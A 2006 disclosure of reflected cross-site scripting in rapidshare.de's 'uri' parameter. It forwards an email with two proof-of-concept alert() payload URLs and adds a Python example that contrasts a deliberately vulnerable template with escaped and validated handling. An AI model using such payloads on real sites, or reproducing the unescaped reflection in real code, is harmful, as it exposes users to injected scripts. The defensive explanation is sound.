The file hosting company rapidshare.de suffers from cross-site scripting (XSS) through the uri parameter.
----- Forwarded message from "Giel S." <ironfist99@gmail.com> -----
Date: Mon, 13 Mar 2006 19:13:11 +0100
From: "Giel S." <ironfist99@gmail.com>
To: staff@packetstormsecurity.org
Subject: Rapidshare XSS

Hi,

I've discovered a (new) Rapidshare.de cross-site scripting attack:

http://rapidshare.de/?uri=/files/11707529%2%3Cscript%3Ealert%28%22Another%20XSS%20in%20rapidshare%2C%20found%20by%20Ironfist%22%29%3B%3C/script%3E&dl.start=Free
http://rapidshare.de/?uri=%2Ffiles%2F15307201%2F%3Cscript%3Ealert(%22Premium%20zone%20also%20not%20secure%22);%3C/script%3E&dl.start=PREMIUM

Maybe an idea for the advisory section?

Greetings,
Ironfist
----- End forwarded message -----
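
The reflection reported above, shown from the server side as an added example (not part of the original message and not Rapidshare's code): the uri value echoed verbatim next to a handler that validates its shape and HTML-encodes it. The page template, the function names and the allowed /files/<id>/<name> pattern are assumptions; the benign URL is constructed.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Assumed shape of a legitimate value: /files/<numeric id>/<file name>
SAFE_URI = re.compile(r"/files/\d{1,12}/[A-Za-z0-9._-]{1,255}")

# Second URL from the report, and a constructed benign request.
REPORTED = ("http://rapidshare.de/?uri=%2Ffiles%2F15307201%2F%3Cscript%3Ealert("
            "%22Premium%20zone%20also%20not%20secure%22);%3C/script%3E"
            "&dl.start=PREMIUM")
BENIGN = "http://rapidshare.de/?uri=%2Ffiles%2F15307201%2Fexample.zip&dl.start=Free"


def get_uri(url):
    """Return the percent-decoded uri parameter ('' if absent)."""
    # separator="&" keeps the ';' inside the value from splitting the query.
    params = parse_qs(urlsplit(url).query, separator="&", keep_blank_values=True)
    return params.get("uri", [""])[0]


def render_vulnerable(url):
    """Hypothetical template that reflects uri verbatim into the page."""
    return "<p>Download: " + get_uri(url) + "</p>"


def render_encoded_only(url):
    """Output encoding alone: markup in uri is shown as text, not parsed."""
    return "<p>Download: " + html.escape(get_uri(url), quote=True) + "</p>"


def render_hardened(url):
    """Reject values outside the expected shape, then encode on output."""
    uri = get_uri(url)
    if not SAFE_URI.fullmatch(uri):
        return "<p>Invalid file reference.</p>"
    return "<p>Download: " + html.escape(uri, quote=True) + "</p>"


if __name__ == "__main__":
    for label, url in (("reported", REPORTED), ("benign", BENIGN)):
        print(label, "vulnerable:", render_vulnerable(url))
        print(label, "encoded:   ", render_encoded_only(url))
        print(label, "hardened:  ", render_hardened(url))
```
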